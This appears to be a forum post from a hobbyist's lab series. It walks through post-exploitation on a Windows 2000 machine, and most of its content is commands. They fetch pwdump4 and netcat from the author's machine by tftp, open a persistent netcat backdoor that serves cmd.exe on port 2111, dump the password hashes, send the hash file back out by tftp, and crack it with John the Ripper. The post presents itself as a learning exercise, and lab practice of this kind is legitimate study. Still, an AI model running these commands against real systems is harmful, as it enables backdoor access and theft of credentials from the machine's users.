continue from last session, this time i'll create backdoor using netcat & do the password assessment using john the ripper...
after got the shell, i'll download a few tools from my pc...
Code:
tftp -i 192.168.0.11 get pwdump4.exe
tftp -i 192.168.0.11 get pwdump4.dll
tftp -i 192.168.0.11 get nc.exe
then, run netcat's for backdoor purposes on port 2111
Quote:
nc -L -p 2111 -e cmd.exe
from win2k machine, run this command to get the password hash
Code:
pwdump4 /l /o:pwdump4.txt
send that hash to my machine
Quote:
tftp 192.168.0.11 put pwdump4.txt
last thing to do for today, do the password assessment
Code:
john -w:wordlist.txt pwdump4.txt
that's it...and game over...
p/s - i'll appreciate for any comment or suggestion to improve my skills.. for the next lab, i'll install iis for unicode exploit's lab...